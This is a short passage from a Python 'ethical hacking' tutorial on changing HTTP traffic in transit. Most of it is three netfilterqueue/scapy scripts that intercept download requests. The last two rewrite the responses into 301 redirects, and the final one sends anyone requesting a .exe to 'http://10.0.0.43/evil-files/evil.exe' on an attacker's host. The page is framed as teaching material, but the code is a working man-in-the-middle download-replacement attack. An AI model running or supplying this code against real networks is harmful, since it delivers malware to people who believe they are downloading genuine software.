Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER（1）

MODIFYING DATA IN HTTP LAYER

 

• Edit requests/responses.
• Replace download requests.
• Inject code(html/Javascript)

Modifying HTTP Requests on the Fly:

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw

ack_list = []


def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    # print(scapy_packet.show())
    if scapy_packet.haslayer(TCP) and scapy_packet.haslayer(Raw):
        if scapy_packet[TCP].dport == 80:
            # print("HTTP Request")
            if ".rar" in scapy_packet[Raw].load.decode():
                print("[+] rar Request")
                ack_list.append(scapy_packet[TCP].ack)
                print(scapy_packet.show())
        elif scapy_packet[TCP].sport == 80:
            if scapy_packet[TCP].seq in ack_list:
                ack_list.remove(scapy_packet[TCP].seq)
                print("[+] Replacing file")
                # print("HTTP Response")
                print(scapy_packet.show())

    packet.accept()


queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print('')

Browse the http website and download the .rar file.

 

Refer to the HTTP Code list to modify the responses.

https://en.wikipedia.org/wiki/List_of_HTTP_status_codes

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw

ack_list = []


def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    if scapy_packet.haslayer(TCP) and scapy_packet.haslayer(Raw):
        if scapy_packet[TCP].dport == 80:
            if ".rar" in scapy_packet[Raw].load.decode():
                print("[+] rar Request")
                ack_list.append(scapy_packet[TCP].ack)
                print(scapy_packet.show())
        elif scapy_packet[TCP].sport == 80:
            if scapy_packet[TCP].seq in ack_list:
                ack_list.remove(scapy_packet[TCP].seq)
                print("[+] Replacing file")
                scapy_packet[Raw].load = "HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/winrar-x64-571sw.exe\n\n"
                del scapy_packet[IP].len
                del scapy_packet[IP].chksum
                del scapy_packet[TCP].chksum
                packet.set_payload(str(scapy_packet).encode())

    packet.accept()


queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print('')

 

Intercepting and replacing downloads on the network

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw

ack_list = []


def set_load(packet, load):
    packet[Raw].load = load
    del packet[IP].len
    del packet[IP].chksum
    del packet[TCP].chksum
    return packet


def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
        # print(scapy_packet[TCP].dport)
        # print(scapy_packet[TCP].sport)
        # print(scapy_packet[TCP].seq)

        if scapy_packet[TCP].dport == 80:
            if ".exe" in scapy_packet[Raw].load.decode():
                print("[+] exe Request")
                ack_list.append(scapy_packet[TCP].ack)
        elif scapy_packet[TCP].sport == 80:
            if scapy_packet[TCP].seq in ack_list:
                ack_list.remove(scapy_packet[TCP].seq)
                print("[+] Replacing file")
                modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.0.43/evil-files/evil.exe\n\n")

                packet.set_payload(str(modified_packet).encode())

    packet.accept()


queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print('')